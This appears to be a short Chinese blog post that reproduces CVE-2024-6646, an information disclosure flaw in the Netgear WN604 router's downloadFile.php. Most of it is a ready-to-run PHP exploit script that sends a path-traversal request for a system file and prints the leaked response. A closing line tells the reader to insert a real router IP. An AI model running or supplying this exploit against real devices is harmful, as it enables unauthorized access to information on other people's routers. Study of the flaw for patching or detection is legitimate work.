Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
<?php
// 目标URL
$targetUrl = 'http://your-router-ip/downloadFile.php?file=../system_rpm';
// 使用cURL发送请求
$ch = curl_init($targetUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// 检查响应代码是否为200,以确认是否成功
if ($httpCode == 200) {
echo "请求成功,响应如下:\n";
echo $response;
} else {
echo "请求失败,响应代码:{$httpCode}";
}
?>
这段PHP代码使用cURL向Netgear WN604路由器的downloadFile.php发送请求,试图利用信息泄露漏洞。如果请求成功,它会输出响应内容,否则输出响应代码。注意替换$targetUrl
中的your-router-ip
为实际路由器的IP地址。
评论已关闭